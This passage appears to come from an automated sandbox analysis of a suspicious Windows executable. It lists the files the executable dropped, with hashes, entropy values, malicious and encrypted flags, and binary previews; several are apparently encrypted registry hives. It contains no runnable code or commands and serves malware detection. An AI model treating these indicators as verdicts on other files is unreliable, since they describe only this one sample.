              Preview:regf..{.}...y.......^....Q.7.....xm...D.E....2.S..u.(...t..8$IP.NpYE...4.oX.y......v..>b...Fcf.E...bWQ.X.a*J..&..=...U.2.}^.f.c....$ca8...U.a[i..../...7m...I....iHh..a0M..<KF...~N.NO^.8......-l.p..,..Lw...z.`.........$.'d.]~._.......%...3C.#%~..).....CW.}...(..o.M)......hb6.GQ.4|E-i.d.^.l...o.i.].+.~.............2..z.$...R....1.P....I.^.....F/..Z...?Ry....|=.g]" :SA.Mg......P=J8.|...Wb.".L....[..1.........M.,.....$;o..YMB.D..ju;#.h ....s..F...|.MF....<.H....w..#..!..&.q.Q.....E:..R..9....&.l..$.........hM....7i=.!>//.W.e._.exE.............D.......x..plrE...~.2z.'.v.?...j1.X...l..3x.(.6PR.X..M.i..c.~..OA..n...K..[{RnO.-d.\.2Z.uM....c.3,.J>A.xJ.\...|...WRj.TO...o...'h.....'.zYY.l;...m.o.+....7.3...~..._q^80.......<..B.8.%.....8...oa.g.7.7:h......x...L2...)0.M.8B.U.....}X.dZ....+.....5.....`I.<?L.S...J.......2Tm/M.Kxq.W....J.......L.0GF..5.!...T......2(.l2.*d....R.....tB=.D^.i....I.q....u...U-...f..T...t.. ..AC.h.lPo..(...&q.....I.....=
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):45240
              Entropy (8bit):7.996267890699781
              Encrypted:true
              SSDEEP:768:RMu7fqPZpiqwMt6HTclbgp5FEYvjF1xpDCk7TI1uQ7e3KO/OEk:ykqidW6YgqYvjF1xpCk7ERj5r
              MD5:A2B10167BBA7B5C1B21266A96B7AC0B5
              SHA1:B1C11822E4D587E2B66C95D9222ED6F942F1F4D6
              SHA-256:219A8ED5051CBA4E3F47FEFB96C04EE73E010928F3CE30566F7943B6F6CDE452
              SHA-512:3F2BBA2BDEE3164E65B87E0B8C1C088457860E1C21C2DE8B49E469DF7760E5C835681516809F875E25F420E5583A6136DF3C187BA0B81F68A56A9C0C6452D501
              Malicious:true
              Preview:E........R^lh...7&>.6S..??},.|K..K....z...j....&.C9.c......#y.>.........v..e#.4(._q$3.....Y...i..........?..GF#....".6Z..'.>..I(zm._&Al:.T,..>..<dg.V.....K...._..y.{.......t.j.. ..J).1..}.8...7..S......r.oq.k;.?............=.$...6O.aHz.\...MJ.M..e.[.......2].4.......3.. u...@..h.P+psz...t$.?.!IZj.n.%.X.i../..- p-...Y..AL..)...z..).-l!!{..../..Pg............b..".(~...u.~D...M9....a.O......Pu......S. .p.d...P..Syj.I*.C |....q#C...........3(...'.]c...7I....Wk.H$..f...d..!....>.....}..{2j8.+......./...?*B.cR#....J../.S....M...u..Q..*.yc_..f..T...:....Q...H.6.r......M.<T...I. 8O.....M..3....8sB..*...V.......z.w.W9.L..........o...C.......R.6,...K..w9x|.b.d.g...^.....uR......A.D.........4..u."..[\cV./...j@..G...m....N..]...p..]..2L.Mj..dm...>u.g6g..i...]...$..$.g}..Q.LS..j.@\.....=._{..J.2....s..\v.X+Y...U...|j.D.do...R....8...7.g.H..=.....aGN7.=..e.....x......i..$.h.$.;..a...G.>\.9..&dY..W...0t.....n.@0..s..UO.....]..w....B.a
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.979036485047818
              Encrypted:false
              SSDEEP:192:YFshFgaJGF2yXydWUHU5BrO1Yw2OGnszw2L2Rgxwju7:YAgaIF2yX+dU7rOk0c02RgOjc
              MD5:A2558FA613C3C0BF901AC643A7079482
              SHA1:384F396C2596DC046675B9BF1EC8C6E17E098CF0
              SHA-256:AC71CA0E3A418BDC642895EFB6A7B6198D099CB6D53D68331B1B545D878FE6C6
              SHA-512:7A0540E265B2481A373156B2F5D4B3A91C6A318E3DDF3CC50C1D92FF5815E743DBE12DB159CCD66C3BA047C38D597493AA87AE676FFF59A7AF83637851434118
              Malicious:false
              Preview:regf..{.$N......d..).@+.e.Q..H3..D.8.C.d]4...l."l........7....O.4..8)....C+..j.P.G..miJ...a3.c.-.4.JD.,a-j...4....NO;..{\..v.....J.......Z....QF.0..&.....Y....^.x..Ep....\.uu.&..;..sPS...:.....nX!...k.O^-....i|.F..*...........*....>Mx.,(..G....{..6.>...h.o...T...k.3..F....}$....b.=..t.A.....KV."4....dQ...#.....=.&b.......w.j..#....yq.+m.....BEM.,..|.@.U...C..].H7.[..1.Z..s.v...<.?b..3..O.L....+.G.J8f.. .Z..t..k..q.YT.....H.JT()z.v.X.....A.|=...N.a.K....b...<.^.. {...UR...(.B.7.2....q.........2.,g.$"......#.d...d} |G.3.<z...?}F."..Q..w.1...7%@....r.33$.....+Jv'..,..{|....x../.5...z...c.~.W*.5..........4.......].?NcG.........$...&@D.......d..dU.}..}g,j.lT.HL.;..P.|....I..pS/.mo.$.b.-..iU4.1..|=..4[.W..Rm.$. ...{..S.G...0....U.)..-O....S. %.;.O(.R....._......c.'..|J...`.+.$47..or........9..V..?..])\.f.b|.Q.-......^.U..m..U}....~......s..v`.?R.ICl....P..$BE?B...I...7...Z...I.M..S._..........l..&.?..Dr.&GM...e..gND...-|...G..6N/.*...Z.k~@.
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.978420389155197
              Encrypted:false
              SSDEEP:192:dVEH9AwyQyRg0MfANVYF2lmDTmVQa2CUgT6d:dhwPSg3ANOk/4gK
              MD5:DEABEC049C8D5D4C168A9EA9BE062BAF
              SHA1:5455B47484D1E3700547EA27A85776AD2F881F98
              SHA-256:66477918739E2B857730CD72430CBCA085333F676747E505E37B1BBF9E82061A
              SHA-512:BDF09B67E8B910206CE8F38C7ACDFCA233490BF9A15148380C8F35D6E25FFFE5EB836FEA331D453AF11B50EB0D40096070D8D3F6E8967E925B4A2A7A5270E1C1
              Malicious:false
              Preview:regf.zD....*a....%R....I-,...-.f...^}.c>,X9Y..*.14 ...{.L..9.h\b.-.T.i.$.@.O.=...e..*...,._.+:..-.Ixt.Nt../F<El..^9...K#.f......)|....q.o.w.e.0..?.........k|...0B..8.dKl..>5<5la.....^.i.K..@>K!.82.7.(.W}m...... .P..$E.&...]K.J&.. ........W.y..Ti......SN.H......#..O..]....N.U^..S}q.Uq.&...h....G.m..+NH.}..c....e{hJ.QvV6..T`...".A..]S...Z....I+..p|.0..O'D%O...`bB.6..J>.n..Q..L.'...'N....P.S....n6.....l..n.J...O......}].8...X..CO.H.{...7........,Hn..L...f..}..`.....0.Y.......~LI<E.{7.`.....S..4c..jF..(.. -..n</...03..../.y..}3.Iv^..n+.D0.......O.\?.........+O...F9vb+.c..?.C....a..6.w.iSK3{~...;..7#(K..bd.n35.3.......t...H.|.f.Z..ytvl=...|T.....bX.;o....n...0....y[e...=..`w....4..!J.6.D>.....\0J....nk9I......W.#.:...m."M@g.......Y..Ni&.....9..(9I%P....c./*q.u.........|.>#[\...p.y....k....u.....h.....O.+.B...B....{.....B...lT[S.-..3C..W.Q.,}....`."..'>..G......pZ..gx.I)......T..}.'...=....HN...}........qB.[..5i!...:...&..........M.}1..V.
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.974806387553102
              Encrypted:false
              SSDEEP:192:GRO5Uq/byijwy5Qq/IkDoMqNrOKHpyWWchMcLtZfNl:GRO5Umby9ehIbQWWiFJZfNl
              MD5:A084F74838126F6AE09FB4791284A8E6
              SHA1:5164D9DEBFDF7B8FB0B4FAB74EEC0249A75EA306
              SHA-256:C05DF4E21FD09A9E69CB3F5EA0F2D247B7373AAA90E0381377EA86E4CC886473
              SHA-512:CD0E7D7F7F1DE6897136EFEE29E120AD66B9FA9B236556EC64482BBBF3B4BE7A058057FB9AABAAC0BD289928E3259482B22107AE704090ABCC1DAE5F03CDA9DA
              Malicious:false
              Preview:regf.x]..|:V..LD...F`tz...S..e...`..].6..nS..AVk...]J....d..7..T.~.N-|7.XY...;..X.E..!/.!fBs..e......0K..n@...]......~.$..C..FK.-....z.....U.....D..y.x.......z.bKDxg.).'.i>..F..)D..F"..d..c......u.>....\!.=D.... ...P..i..j.LS.Q#..#>.5.r.Bb.N>.._f."o]....,........u..7.D}..V.v.......)...cO..5..u....^..]i.G.e.Q]E...!.\].....V..]..kK...n..A....kR..&.o.2..C..@..[A......Y...2..+@}...fe.v<.R"%~..+q...olP..2...C...x.>A.....7.~....[...om.O|..:x...5C....i.O.tn..;..X............'....(.+~..H..@.%..3J..k...v,#.]/..O6.....G...p`.T~`..B.<..]..4.!....L.XIH..tO|..{:sH...n....5....fe...w<b........|.=..Y.o..*..^...d9.y...V....._....#.fx...f.-....Ll..f..}.w`..)'...3...G.Qu_...p.(.l>..>YD..^..vL.x?$D...Y....9{..L.].BG/R9.UM..r........2.m......)..M.Y0.....3..9Y..AI...S.l...Q7...."X4..X.?.....M....a]4Fm..vG...D.;.+..y...#1.........t)L.;\k.....S?.7f....m..V+u.Jq..".P..s..4..f.<2.*...v34.$)D....L....E..@..r......M....v.*.7.D9.......G.E.!.m.^.......J.@`L......p( E.y
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.977621636814134
              Encrypted:false
              SSDEEP:192:pAh4UCQsbCL43U1+0T7GedwZeRjq6ekvx1x3YyxIyVtFOFvSgW:pArcf3U0QbdwU5quvLtYgIyU+
              MD5:7A57DCB4ACD65497D84573E05CF4147E
              SHA1:AC4556D7861ACD24790E0E53B488E78335CDFEAA
              SHA-256:689F6E197BA848E1A7904995F75C2853377F52C6B6B82FA593F07FF79FB41EB9
              SHA-512:4B7A5C80DE89FF4C5BE193CEDE6333FFFC972601CB68D99069BBCF0411499778E6023C52496FA56860569C19E285858B0BDA76F50934A8A9C3D32FA7D7A3FFED
              Malicious:false
              Preview:regf.....r.e....E|)..........$.....c.$Fm..P.....<...t!m.y...s.^....T..W.rs...Oy\.q.uO...C....xX.V\...........iT...S.O.....6.+p...5..O.g.....%.0.g.I[....V........i....r..E...n.D.f..jF...p).'......N.+}#}.....g~..^.]..a6o..e$.....K.]V5%..ptnA...O9.u.+q7U.5..!B{Rd...V..t)(.F..N..V..'...A.e...{.)\...<i;...."x..r..B.x..K.t...1.T..bc....r...f.....V`I..u..(..So.9...@iF.].,..........+.....,.......i...yh..lr.a...6gW?=.Qe..;..."..I...:H.z:...#."...d...D.u..K.."_.J....1ucz.vXM.}.i..j.........xF..4.D....G....]...E.C.R.l.*..\..m@n..(.....2.u'....AI.x.."!....}^#...Z...b......N..N.;H^..#...)r.N!K..."Aj..m..@M!T&.m..>.6....c...|......@..d{....A....R.Se.vJ}.0.`f.Y.....>....Lk?...vbUr..J...,..@.........6....Y..z...#.0...a..>...)<..qe.W.L+....y...'....{.!dQ..Y2J....1]..0.\.Z......1.X.z.t....@.Q...(.U3.....O....G..Jd8?G.&....].....z....q;uk.p.v.N....vC....".=....r.V...i..Gq.....Q..(`.P..c."a.6.Q..C..*..1Eh....$..%5...q._.6..a..;.N?.......G.Z7y..K...E.7f6.Hq...
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.974143965490072
              Encrypted:false
              SSDEEP:192:dRRgSCUfmSU8vkGtyInuIei384ses9/bjEtLAvSpD:dPgSCUpJMGXveI8X9bq0S
              MD5:B75CCEC2B8782D8A7F16E4E684D1D77D
              SHA1:33815F6DA27D19275F1EA92EBAE812625C580E0D
              SHA-256:D005B875DA57CE66EFA993A8EC4D92526962AEC12925D062BFB1AA257D1A4411
              SHA-512:A9DFC1B343B70C185EAC863E91074FE098BE57809F111E20C48B80C7FFFA5885F3C934D72067C52727311577D4DDEF51F2490609297D8C12161EC109FE16BFFB
              Malicious:false
              Preview:regf.-..20.G=.z...S.)..M..x..e..Dz...P.l......QGw!.&....#..'..x....i.i.......[e.....G...2....,f.0....}.#E......[.y...}P._...K..>4V.4....i..R.%..v...J..N.-%...?.c<.i.....9..*.iD...\.Xo.XN.O.#...P6.Hc....]H.n...M...`.~......... x.x....x..c,.......8j..(.o.s+c..............4.......9...pC4....5[O9......UfK.J....C..EH...a. .C^...r-.....c.P.V....JQJ.D.&.[.........m._.......Z@-.)Gx..Ed..I.@./..#......#.X.K...*...^J..8........y....nC<.6]KR..).)n..j|..p...>..i4X...sS.._.;..t\......<u..Wj_.,.,..13....Q..!....M.G.n@.Lh#Ho.Wj..i....Q..4...{....Q.P.Wi...[~C..j+.J....;d...8!.Ee7.Ob,.I_._..jI._`...]....iC._...V|..].....HO...N..}N..N.7.....".tt.K..[....V...O..I...y~......\...s#.F..A.nj.."...W...\..s.%..5.w.B....].O..g.F...|.^..R..D....Rrk..`....{...s.7..`.v9_....*1..p.&...!.lB...J.#.A.5;./ZY...k....I.......6..#...M.....*W..Q....9.+..G...?..v.9..^..:....Y,.|.6'..f.S8.w........)V.d.oaz..<.o....P.>.v.LK..2.......9r%S.lm..V...ZJ.....y...;.o>bV..&..T....xd..#..
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.976747943443057
              Encrypted:false
              SSDEEP:192:noa56b6Oji/cb8saAixUgJRTKSi56+sEVc3OJay:nbEesRbSAiDJR+sEV5H
              MD5:E68500CDBDCE29A0B295B49F7DF52006
              SHA1:5B791028A817D35B8009196B188BC41ED575611C
              SHA-256:AF50C6FD39FF3839C07FC17393DB61BF90F7A5C8FEB7F2371A0101F7DD95A30F
              SHA-512:3A59C284A80EC7C06F95ECEEA7CD4A54AD08539871B4C77F8E53FBBD7EFB488208DE604EEE554521F09D73B31B4EFF1B4EA267E998DBEEFEE3AA697B273C85A8
              Malicious:false
              Preview:regf.....[..A.].a.....o..Ibx..+$..'..aC..8Q..]v.......6..1{..M..%-...Vb?.{-`._... d.8.kjl-....(..... .T.#L'L.\.5.r.q.Y...R..+BYt..o..bw.R+./....x.<....>.......h..e%.P.m:...}...}..~.......K..(..-w.(...;...[&-96"Mvc'.O...**@...{..a...\....}j3......9.U.....o.......vf@...aq.DS...7k...0E.27..@]...G....,q@>3...PQ........u).....X)...I$......-...u...'.0.XV:UE.;.(..km..\as<i>tm..a...&.....h`....'X5.......s.3..... .<b.f..P...[....<..L."F.#.8..K.t.....t...\......#GF....}l.......`....m.\.3.9pxA.oX.,_8_.4.o.6..........r..+...N......wq.pT....!..7...5...>&.............;...2\U.m.M=.k>.3,...n....A...W.y;l..M&...[9...?..3.... "9s..N. ....4..T.0:....Q.......?.1......q.).r..zt.*-...w\J.K....%....\..z.O.[2....HZ..J.W:.....8..f;.~..v...[.)....+1z?\_$..#)M..,....$;....0{.....*`i....GS...u..5,./.......-}.t.#..A...G..R.......j...j...n.}S.....E....bJ ..T"?6...(j....pD......_.....C.'.o.@$..9..8.e......k).;....m.;F....8..p.{{..;.)......tjv....-.}"
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):65870
              Entropy (8bit):7.997450435185943
              Encrypted:true
              SSDEEP:1536:8pUx9t4Dk1UJLwnvwqhFTVDd1ECVsICdDv5p06+H:86qI1M9Id31hyz06+H
              MD5:0A47BD52B97E162DB55444D4BD4284F7
              SHA1:728A735A53BCDEF6F693398FD6D4BC587D3573CE
              SHA-256:945D0A0744F818EDB0C94A309C49F2097A321C7A152D862797162CCA5FB8FD2D
              SHA-512:AC94D3D5BB9576763F066FD8AA399479FD06C915BA4E3D493F2E5A29750AD5C6013E6438BB7B8279757CB535B1D6B88D1AB608A87FF8D647E51C420FB2DD7084
              Malicious:true
              Preview:.....t..f.bd...'..K...v..v.....C.K.{.../...S.P..+?.;eP.....j...>.m.}..>;`..a.yB...f.U...@W..V.O=.....^....4....bc((...K..2.. ..l=.....9%fHO...W..?.H.'.HA.+..a..~1..g.....v.PE...<.o...........5...t4@P.Db^:(.a..5...R./..f...{.%.......`..j........y.6$;.k:.........e..YQ....]..f...Z.s~.9......V.bg00.......bu=.`Z.*.P..x.E>..?...Bz.!c2.'.....,U.L..f.......c.....ny...G.....}.......&`.R..@.k..Ad...u/.]........U..:...u|...O..b.a...D..@.*....-.P...I7.zAcLe.k].../....~.)9XD...3..|P... qy..u&...O~.e7....8.P...R..H....LCl.lj:..QF\A6.f.......N@.U....6"..l<...w..l.*.'1.5A...Sb%...K...T.+...@..<}a...W...G.L1.s...a.+.....]c.H....,.\..bv.^,..$.....w.o...E.T.3..k.U...;.....vUFi.]?&..i.Q..V...j.Hn5.7.~..~..4.".....1..'.H..{.#S.......hn...#8.I...O...%.G..eF..{......J.f..O..oS....@?.=.bm3.Cz.6S.X.,..:.A..ka..h^U..`......|.<.....8...['*CO..+.. ............~<uG..B?..,T@q.]JV o.wu.[...l....v}9..=!N..n...Z..K....U..........}... .n~e.5......H.{h..h.
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):65870
              Entropy (8bit):7.99696208992
              Encrypted:true
              SSDEEP:1536:aXbFu7wnVPE0KW24JjN/dvloYCoDjxMKSg/TdmY2nWcfm6Yd:uo0VPEA/JjN0YC2F+g7YY2WcfPYd
              MD5:2E96C2C6EDBF3793AFB0697FC7EAD6DD
              SHA1:9837BDA0DDAB3C65D8AC7298004CBCA014D34386
              SHA-256:2C94F93381E029C7EE25D3AF2AEC8D24464BEF115383D643130806ED4C5FA8C7
              SHA-512:D3B83B16C9E5ECCDAA27EE2668FCFC0E6F7A79ACF046B9190DCCA1880B893CAE6EA4FAEEB02030EC337FF8ABD4F1D04F15280E84FA3FA314D5217F1A9A99587E
              Malicious:true
              Preview:.....:...=(..P..."M$....X../>...:b0Z..wJ...K.9.wy.\0....`...;...<D..x..Uje.#8.x.}...b.+...f...as9..H.G[..$:K...[s.D...LvW...G.....s.^.-.%diD..O..9.0....+.K.u..y.[vx.-.....Bn&....,p.Yg....P.t....N=W..p .xc.1/Y...?.J...l[}.e..7......e..'..:.D;.H28.\.0........BM....Y5xm...-......iH.R...1.1....K4R..Kj.>....w..;...5.k.#.$._..I..?.(>...}T..l?.\...<.h....}...e.B.Q5.[{....Fo.Ri..SX.0.....c..<t.-)...0.....j...y..]6j..sHOc.,....77..-5S...#...%..j.e......D5.U...l....W.....P...............^..`.Vj....-,b.]...3.igT.(."'..YED.w......Y.eN...-.....{..+K+..(.o<^r...C...p...+..Y....A...4...f|.KgH\...P&..H.=....rm.[...gv"..(.D.<>..(.c....7.G.....s.O....)=F....t.....@._.T2(.e......U.....I.4....g....W..g+....4.....F....(...j...R.......T....U.B}.2.....O....|r..,..F.a...+.Z-/....y .....}+F\..{L...;i.23`Q...D........@/_...V.MR..7.).?..oU...3s....B =.7...P....{St...."..*.Q...|..W7.N.U..`.[.r......t...4...t..t,..X...h..z.K-F........q..T.Qn...YW....7Y.?..bdB.p?n.R
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):4194638
              Entropy (8bit):1.304376358868173
              Encrypted:false
              SSDEEP:6144:59/El8LGM7kx7nW8u7Ypr74InWpd8dEckzIv:59/kZbu7Ypr7LnS8dRkMv
              MD5:41B17184905B5C6C8428BB7275739958
              SHA1:0C0AF7BD735A22E8F17F3A59B00E22B303B36B91
              SHA-256:FE23733F3CD334A03FAE983E00F9F09BFCD709EE2DEA83A67604B51146905F0E
              SHA-512:5007F64EC11C0CE127C87DC59B61B4BF6B8BF451AFFB16E5A0970F0359166FADAD91E3E8E40FDE3F73206253E3058E6E9D6F695F0FAB00CD8840F9F54EA6A27A
              Malicious:false
              Preview:Nostrrd/............KW..C..c...jJYK..-.^7..u.....).'.%L.g|s.u.}[.....z..R.w.Vj.I.=..U..0...7CM......S.C..)..'.+..+.....n....YS.b>Q.S2.J..lXe.Y.7^q..<...W`G..-BR.z...jp.]Br.<y$.YO.oq.&v.H....g..yB...4.......fV.k....A..9....k:K#..8........4....B..1.]#X....E...Nsy..Sj.....]..T...a...P%..C...Tu.l....O. .d.....\|.-1....J.}[.wXZ.9..@...i.Q..5..4M>6[P......(..E.....o.....`.......J{.(.rq....r.....w.4...7.H2=.d.....y....l....q.....]>.W..j......+....2.....Td_aI.]s\....5r........P.}.yV..6..B.m.6..?a.m..;.,..7.......H....6...6.._..E..ke].....i4...Q..P...#z.... .....c.V....~....x:.U.....a..).'.-....Scyw:.n\..a.1.Fc....ik....&O.L...D..15._Y.f..Z.~..q...g..E.'..N..;..C#:..}.r.lM..A..B..........O..6m..c.K..t.>..............0..EBiJd......a.q.`Qf..j+..x....)..Dy.....^..o..&p.%.3.x.J........m...+.u/.....f.`..r....z../..B.. .F...=..M......0p..G.........j...s[.P...;jm..Je.)NE.$.A<..]......F....t.<9..Ps1.s....j.4......"...$.S..5l....^#...R+r..u.{.&..k?.......^.
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):16718
              Entropy (8bit):7.991159033829741
              Encrypted:true
              SSDEEP:384:h3zvtxoOAvVkdSfh9CysSA3g1hHPkXqMR9a3HRNxibDcj94A:h3zVxoOah9C7Sx1hvk6Ma3HUbD+V
              MD5:4635560E432CFC604D8D7A36AA471F1E
              SHA1:6070DBC667CC0C789A3B43427C3610796099ED3B
              SHA-256:5C8F6B75E3950F6B3D2AAC5D7E593C1D8828A4AF0DE42D7B9486771ABCE9B541
              SHA-512:0F1D835D17C4C0068002D7C97A9BE6100DEEDB75A0011A99270B8601305C396BCCA94E7C3A6C56E656B2A0375F8DDC301E5DD3C67162C5E658FCBCD281CD0012
              Malicious:true
              Preview:regf...i.g..)~9..*.4 ......S..R2...v.U.bR.LS...NC%j."..J.<.!*........^.I.....g..V...4......X.!@..dz...+...xQ....-`Z..9R..B..v<::.....6..LX...j...&VB..px.$..f....g8...l:.J....Z@..@@F.M;Q.7l...w0....} ..:..C.......6".D.......V......%.U...jw...Pj.7..+..8.!..$(....yI.X.M....?/...\~..?W.....*..?..|pTjR.Z.*H..=E....6eL{k2...=z1.e..\..-w....*.<..Dk[.9.U.U.r.bt..5...-..v.q....HL.%h.|..W.-.*...a.m.....>..b.0....A.....r......t.3..Zu..Y...](..^y..;k.......:..j*.....A.b.t<P..dF...r.B....@.?;.?j..A.....b{`...;4KL.....,.....3.8..s..'G.,.....DFV..K1f...=..KP.2.....>........5.J..FW.d...3y..zh.B.n.C3......@-.e.+.K.B....\C......P.}A..Qm.'..S.:..F(..,..R..P.V..+4...>.......2.a..w..8E..(a .%.v...n...S....d@.]m....A.p...j..."....<.u..^...H..7F.0..A..i.?M.-..=.....[......V.[.!i.!Fc..j..N'../#3..;yH..`.s..X.W....|..7.Ubw~.d.W..........t..}.......]......+al.|YUT6..r..Y.3...f....YU.@Y$q.6....4..X99x..S..R....u....H&........0B< ......8y..%:.3...J.D.@.P.....qr6./m{
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):16718
              Entropy (8bit):7.987981957262101
              Encrypted:false
              SSDEEP:384:zgf/WjKYqP/b7E3b9cPR4SsRjEsyqIphHYnWzKuwuad1u6Wxd/RH9+:zgNJHvE3U4SC9ymdpuThv/i
              MD5:B5C04908A3378449438993522D568825
              SHA1:35668E34C08D843F188551B92F699A99BFE8968A
              SHA-256:7F6ADA3FFE4A8988547E4A43E67A8FFE4A7B23482348C59E88165DEFC73206F9
              SHA-512:8E30173F8057CB059242B512BEF62018238959A545698C3F3CE85F14D440C6932B5FF9FC65C6B5C7C163953405BC1E501B8C3CF757A65F8D6F9446758F238CF6
              Malicious:false
              Preview:regf...m....%...8Q.&...s...{t.X.:K&n....c$..d....;.........K[........8X..v.$.'.1w.'tX.....]...sU.?....k.D...c:..H..J...r..S<rA.0v..$.7:SG^.t[_....F..z.V.H..L.....5../..s;@H.]...9{..5`.\...h.w..~.'m....M.A.../...}...9..i..../.|."..:. .q.../)R+..v...!].1"..8m......jM..(.3r.,{.../...G..iP.PO..>w...(2...I.`%Ne..._....%5.7......C....#..l..q........d..1..1.S..E.6N=K'......5.l....t... .5o<..N.h..W"K.....Kc..v5'....di...._/2).u^..HKeI.ZJdJ.6$MXNJQ]....J[.y....}<.....W~.9...m.\2...J....%......o.. ......h...;.W.&nNr...g...h...!...b.;yk[O.........#..k.....C...p...-.}v....(.........B.36..9-h......9+.Pcs[...r.p.d/.o...5..S.Q.../.Y.K....3."...........#:.... &..5.NS..[9..z...d{#.{.BL..A..(G.*%...l|Ck.'$..d$.k.Yd..7./|.Q.X........&.u..M....c"]u...n....s.E....J..3.`........NF..v.d.......g.P.E.p$..p8.2M.}i.U...*.e.S27...&@.c......X..px.;C.(>....hwr.x:.\...?.... ..@8.".....G.D.@m..Z../.....%.O.@...-...+.....)...#..x..Y..f]'h.."t.....Q..m#.t.
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):8547662
              Entropy (8bit):5.205066036859209
              Encrypted:false
              SSDEEP:49152:vStkr38OPKW0ANge+q80Ibxh0T4tI6lIfKi5YJj1PKu1ZKKO1:v9TF1qd/LKN1
              MD5:CE2B1509F50B3B428377CFACC53270DD
              SHA1:AE86A699B680E3635A0A456EF10F047291874C16
              SHA-256:40E4CFCA138B4DCAC15B7F4B1D7BCBE11C2E9BEF98777CC281E047F5782628BD
              SHA-512:23FEEFA55BA1CD567CB8A909E085AE3A84ABDD3B85D8112AD72BECA475B56726D0D4D2F3D51CD87BD1FF42EA88224FD3F8D9079F22579E229B664F7F99579D41
              Malicious:false
              Preview:Micro...9..@)...io.w.%..=x*....o.C..._M6..h.m.m.(z.;.......H....._.M...[...{.........I.......Sp..s.go...]...8.*.......t.b.......5Un.k.n?...)..w.ko.j..DxFk.A"Y6.g.i...@K.p.,(.h7.n.u.m~cP...ZR~..Z9q.0(......./..'........o^..+...`!dV.q.,]|2..0."....g.7.kY.=u.'.W.-..D..%....G....>...wQ.J........j....TS[...c{..-...44.'.N...D.3...aFM.../..I..,~~n...V....pz...V..eY..z.W.6..:. .X..e.C.??..NK..$.......[J...9.....k:.L}....c*...h..x..C..6..._..K.. ..o ."]7.i......v.Q....C..@.{Bu.s7%G......tka"....o......B).........R.f.<.."uOaao.x+...........b..T.. a.!..(.;..#FY9k....w.RA..5|...e....D..C.^........a-S...|=..."..-...(8..A."eAO.WJ.n.J...Y.`.{.]*..Y(m...)d1.W.7.`..b9.&/.K..;U..z.+..aar..I..O.w..?.llI.v..........:,.E...q.....<j.31.W..... .v...-.~...n..TS....c!...C.1.w..o......by3k..)a:.0.z.5...2&........F$..*.".l..o...{.U..^.yb..;.mqzZ.+.eD ...xQ.....~6.......u.O.f..N<....:...c<.DA/.5..N"Q\..#..N..^da..1..........?..r0.c..x.g.dc...O.M..D...q..I....qc.X.....
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):8547662
              Entropy (8bit):5.2051187379887205
              Encrypted:false
              SSDEEP:49152:IxNrf38OPKW0ANge+q80Ibxh0T4tI6lIfKi5YJj1PKu1ZKKOJ:0/F1qd/LKNJ
              MD5:D842D1F1B5EB55F0D995FE12987D00EE
              SHA1:215155F0026EA20AB0CB3C272B5B4976CBDB3CE4
              SHA-256:50EDF8E60C5515C009E1EB1F354677DC1C69D546A9C25BEC8DC42EB7F43EED5B
              SHA-512:7BE35EA47B292F1AE49821FBE21EDE17ACFECEA4037A2105B02D7C30857E83D5B5040BEFE6DCFDC8AB93A44982C0EE26482D5AABA4FB740E2085C2D69A60EE54
              Malicious:false
              Preview:MicroW......a.B*......\.<.....'.L,...y2...E..yZa93.x\@.v.ub[....}.I1./....3O.2.-........:y5.i.Z.1.\t............h... .Lml.kn.'.h.J...c.}..X.H&(..^.#.$.<...]..p...:......XSB@...;B...Fp.....x.....N.FK....!.u.......D$...j..O.a.J..x;....3d.Tv-.r....6.E.[.:.....MQ...J<.sO.F.{hz.n.FQ..w.k8h.'.I'W....%q...r...u...\G.@+.v.i..D+....z.....Y......?MV..Z...@.&........0...I....-.......[<.._`..=.....e...4R?...<.Kz.0F...m.E.C.>j...5....(....zo.%....`g.J..4...j....1..6....>......7..p|L..........:....#2`b...=ud.x8t...FQ9.o......<..>..&.g...e.0.W..c].X..J........r.e.t..H.v.`~+.G.....2.|}v3.]...Z......J!yX7y.....r37Po~.g..%..<..r.D^....e...].Z..S.*..$.<a^t..hU.`T7..#.....|...Z.3..%.......$.....m..LHA.h.DR.,.1.......J..(L..?......X.l...`-|H.e.....&J.+..S%oN$xa...E.j....g.c..9.w.xh..r.G...x..R0(t..U....7...B.......(.5.$|...G(..'..;..}.>..!.".3M.k.J.E.w.W..F..vz....8}Z...-a...,..B...!.t/.p.....:X9&..R.W...}.g.&.R*..``..$......3.....r...FE.s&.....Z."1..
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):1192270
              Entropy (8bit):5.662881174534565
              Encrypted:false
              SSDEEP:12288:sI6MVyqk0ZUQJQ4aKVmaS4aMz8Pg3lxJo2cvXtL:mnqk0ZdBaKVzaYcAqtL
              MD5:806D96C6C86A24C13CA11CF94CD3CD61
              SHA1:108225EDE01EBE7D3A0FDEDD4D46E5EFCF520912
